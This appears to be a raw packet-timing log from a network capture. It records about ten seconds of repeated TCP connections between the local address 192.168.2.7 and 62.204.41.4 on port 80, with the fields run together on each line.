                                                                      Feb 7, 2023 23:09:07.180000067 CET805016462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:07.180095911 CET5016480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:07.186121941 CET5016480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:07.246880054 CET805016462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:07.250969887 CET805016462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:07.251082897 CET5016480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:07.536629915 CET5016480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:07.538094044 CET5016580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:07.598037004 CET805016462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:07.598212957 CET5016480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:07.598472118 CET805016562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:07.598577976 CET5016580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:07.791157007 CET5016580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:07.851633072 CET805016562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:07.854868889 CET805016562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:07.854985952 CET5016580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:08.025089979 CET5016580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:08.025916100 CET5016680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:08.085727930 CET805016562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:08.086014986 CET5016580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:08.086358070 CET805016662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:08.086494923 CET5016680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:08.121536016 CET5016680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:08.182141066 CET805016662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:08.184685946 CET805016662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:08.184813976 CET5016680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:08.337661028 CET5016680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:08.339634895 CET5016780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:08.398325920 CET805016662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:08.398479939 CET5016680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:08.399971008 CET805016762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:08.401683092 CET5016780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:08.918958902 CET5016780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:08.979978085 CET805016762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:08.983628035 CET805016762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:08.984139919 CET5016780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:09.103317976 CET5016780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:09.103789091 CET5016880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:09.166131020 CET805016762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:09.166762114 CET5016780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:09.166881084 CET805016862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:09.167118073 CET5016880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:09.197665930 CET5016880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:09.261799097 CET805016862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:09.261853933 CET805016862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:09.261955023 CET5016880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:09.453097105 CET5016880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:09.453859091 CET5016980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:09.514365911 CET805016962.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:09.514616966 CET5016980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:09.516061068 CET805016862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:09.517276049 CET5016880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:10.009649038 CET5016980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:10.072380066 CET805016962.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:10.078298092 CET805016962.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:10.078447104 CET5016980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:10.596937895 CET5016980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:10.597729921 CET5017080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:10.657676935 CET805016962.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:10.657759905 CET5016980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:10.658680916 CET805017062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:10.658847094 CET5017080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:10.682104111 CET5017080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:10.743100882 CET805017062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:10.745945930 CET805017062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:10.746062994 CET5017080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:10.867935896 CET5017080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:10.873358965 CET5017180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:10.928991079 CET805017062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:10.929400921 CET5017080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:10.935065985 CET805017162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:10.935303926 CET5017180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:10.958889961 CET5017180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.020620108 CET805017162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:11.023277998 CET805017162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:11.023533106 CET5017180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.181263924 CET5017180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.182009935 CET5017280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.242613077 CET805017262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:11.242774010 CET5017280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.242906094 CET805017162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:11.243010044 CET5017180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.243218899 CET5017280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.303605080 CET805017262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:11.306339979 CET805017262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:11.306416988 CET5017280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.414664984 CET5017280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.416397095 CET5017380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.475644112 CET805017262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:11.475872993 CET5017280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.478837013 CET805017362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:11.478960037 CET5017380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.479350090 CET5017380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.541702032 CET805017362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:11.544918060 CET805017362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:11.545030117 CET5017380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.649343014 CET5017380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.650830030 CET5017480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.712146997 CET805017362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:11.712357998 CET5017380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.712562084 CET805017462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:11.712737083 CET5017480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.713079929 CET5017480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.774631977 CET805017462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:11.777556896 CET805017462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:11.777750015 CET5017480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.887567997 CET5017480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.888787985 CET5017580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.949475050 CET805017562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:11.949538946 CET805017462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:11.949704885 CET5017580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.949769974 CET5017480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:11.950103045 CET5017580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.010550976 CET805017562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:12.012918949 CET805017562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:12.013063908 CET5017580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.118324995 CET5017580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.123002052 CET5017680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.179121971 CET805017562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:12.179231882 CET5017580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.184628963 CET805017662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:12.184807062 CET5017680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.185199976 CET5017680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.246594906 CET805017662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:12.250057936 CET805017662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:12.250281096 CET5017680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.367985964 CET5017680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.368928909 CET5017780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.429589987 CET805017762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:12.429627895 CET805017662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:12.430123091 CET5017680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.430712938 CET5017780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.432080030 CET5017780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.492750883 CET805017762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:12.495201111 CET805017762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:12.495896101 CET5017780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.602715969 CET5017780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.603456020 CET5017880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.663721085 CET805017762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:12.664264917 CET5017780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.665361881 CET805017862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:12.665510893 CET5017880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.666182041 CET5017880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.727914095 CET805017862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:12.730153084 CET805017862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:12.730309010 CET5017880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.851630926 CET5017880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.852408886 CET5017980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.913139105 CET805017962.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:12.913378954 CET5017980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.913480997 CET805017862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:12.913570881 CET5017880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.913891077 CET5017980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:12.974457026 CET805017962.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:12.977729082 CET805017962.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:12.977874994 CET5017980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.087672949 CET5017980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.091620922 CET5018080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.148575068 CET805017962.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:13.148762941 CET5017980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.154109955 CET805018062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:13.154359102 CET5018080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.154966116 CET5018080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.217349052 CET805018062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:13.220128059 CET805018062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:13.221071005 CET5018080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.338555098 CET5018080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.339814901 CET5018180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.401225090 CET805018062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:13.401948929 CET5018080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.402405977 CET805018162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:13.402534962 CET5018180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.403024912 CET5018180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.465456009 CET805018162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:13.468801975 CET805018162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:13.469007969 CET5018180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.586476088 CET5018180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.588542938 CET5018280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.648204088 CET805018262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:13.648416996 CET5018280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.649143934 CET805018162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:13.649266958 CET5018180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.649408102 CET5018280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.709044933 CET805018262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:13.712430954 CET805018262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:13.712563038 CET5018280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.820681095 CET5018280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.821399927 CET5018380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.880263090 CET805018262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:13.880372047 CET5018280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.882649899 CET805018362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:13.882884979 CET5018380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.886210918 CET5018380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:13.947546959 CET805018362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:13.950521946 CET805018362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:13.950668097 CET5018380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.054678917 CET5018380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.055460930 CET5018480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.116347075 CET805018362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:14.116437912 CET5018380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.116765976 CET805018462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:14.116930962 CET5018480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.118143082 CET5018480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.179326057 CET805018462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:14.182687998 CET805018462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:14.182874918 CET5018480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.294841051 CET5018480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.299336910 CET5018580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.356292963 CET805018462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:14.357669115 CET5018480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.359798908 CET805018562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:14.359947920 CET5018580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.360321999 CET5018580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.420708895 CET805018562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:14.423168898 CET805018562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:14.426464081 CET5018580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.543342113 CET5018580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.544131994 CET5018680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.603908062 CET805018562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:14.603984118 CET5018580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.604499102 CET805018662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:14.606547117 CET5018680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.607278109 CET5018680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.667646885 CET805018662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:14.671169043 CET805018662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:14.671334028 CET5018680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.774724960 CET5018680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.775458097 CET5018780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.835304976 CET805018662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:14.835431099 CET5018680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.835702896 CET805018762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:14.835830927 CET5018780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.862061024 CET5018780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:14.922805071 CET805018762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:14.928833008 CET805018762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:14.929040909 CET5018780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.039403915 CET5018780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.040079117 CET5018880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.099982977 CET805018762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:15.102302074 CET805018862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:15.102480888 CET5018780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.102551937 CET5018880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.102933884 CET5018880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.166090965 CET805018862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:15.170551062 CET805018862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:15.174649954 CET5018880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.290076971 CET5018880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.294811964 CET5018980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.352453947 CET805018862.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:15.352647066 CET5018880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.355127096 CET805018962.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:15.357636929 CET5018980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.358032942 CET5018980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.418268919 CET805018962.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:15.420347929 CET805018962.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:15.420573950 CET5018980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.529454947 CET5018980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.530463934 CET5019080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.589834929 CET805019062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:15.589931011 CET805018962.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:15.590141058 CET5019080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.590157032 CET5018980192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.591789961 CET5019080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.651084900 CET805019062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:15.653491974 CET805019062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:15.657754898 CET5019080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.775027990 CET5019080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.776237965 CET5019180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.834765911 CET805019062.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:15.835180998 CET5019080192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.837028027 CET805019162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:15.841953039 CET5019180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.842998981 CET5019180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:15.903717041 CET805019162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:15.951698065 CET805019162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:15.952351093 CET5019180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.056361914 CET5019180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.057496071 CET5019280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.117039919 CET805019162.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:16.118779898 CET5019180192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.119791031 CET805019262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:16.119956017 CET5019280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.124887943 CET5019280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.187309027 CET805019262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:16.190716982 CET805019262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:16.192075968 CET5019280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.305829048 CET5019280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.306926012 CET5019380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.368576050 CET805019262.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:16.368807077 CET5019280192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.369311094 CET805019362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:16.369443893 CET5019380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.370707989 CET5019380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.433226109 CET805019362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:16.436515093 CET805019362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:16.436700106 CET5019380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.556839943 CET5019380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.558481932 CET5019480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.619276047 CET805019462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:16.619339943 CET805019362.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:16.619602919 CET5019380192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.619981050 CET5019480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.621524096 CET5019480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.682019949 CET805019462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:16.685125113 CET805019462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:16.685342073 CET5019480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.796437025 CET5019480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.797291040 CET5019580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.857196093 CET805019462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:16.857426882 CET5019480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.859718084 CET805019562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:16.859885931 CET5019580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.860331059 CET5019580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:16.922935009 CET805019562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:16.925700903 CET805019562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:16.925980091 CET5019580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:17.044682026 CET5019580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:17.045996904 CET5019680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:17.105413914 CET805019662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:17.105557919 CET5019680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:17.107351065 CET805019562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:17.107420921 CET5019580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:17.107942104 CET5019680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:17.167345047 CET805019662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:17.171992064 CET805019662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:17.172112942 CET5019680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:17.296294928 CET5019680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:17.297290087 CET5019780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:17.355957985 CET805019662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:17.356106997 CET5019680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:17.359987020 CET805019762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:17.360137939 CET5019780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:17.360534906 CET5019780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:17.423247099 CET805019762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:17.425403118 CET805019762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:17.425517082 CET5019780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:17.544447899 CET5019780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:17.547672033 CET5019880192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:09:17.607398033 CET805019762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:09:17.607517004 CET5019780192.168.2.762.204.41.4
